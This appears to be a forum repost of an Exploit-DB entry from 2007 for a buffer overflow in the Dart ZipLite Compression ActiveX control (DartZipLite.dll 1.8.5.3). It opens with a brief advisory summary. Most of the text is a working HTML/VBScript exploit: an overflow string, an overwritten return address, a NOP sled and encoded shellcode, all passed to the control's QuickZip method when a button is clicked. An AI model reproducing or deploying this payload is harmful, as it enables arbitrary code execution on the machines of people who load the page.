Exploit Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30069
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2007-05-22
HTML:
source: https://www.securityfocus.com/bid/24099/info

The Dart ZipLite Compression ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Dart ZipLite Compression ActiveX control 1.8.5.3 is vulnerable to this issue; other versions may also be affected. 

<pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------- <b>Dart ZipLite Compression for ActiveX (DartZipLite.dll v. 1.8.5.3) Local Buffer Overflow Exploit</b> url: http://www.dart.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Special thanks to <b><font color=red>rgod</font></b> that found the bug in DartZip.dll for his exploit see <a href="http://retrogod.altervista.org/ie_DartZip_bof.html">http://retrogod.altervista.org/ie_DartZip_bof.html</a> ------------------------------------------------------------------------------------------------- <object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() buff = String(1024, "A") get_EIP = unescape("%EB%AA%3F%7E") buff1 = String(28, "A") nop = String(16, unescape("%90")) shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + buff1 + nop + shellcode + nop test.QuickZip egg, "default", True, True, "default", 1 End Sub </script> </span></span> </code></pre>
 
Источник
www.exploit-db.com

Похожие темы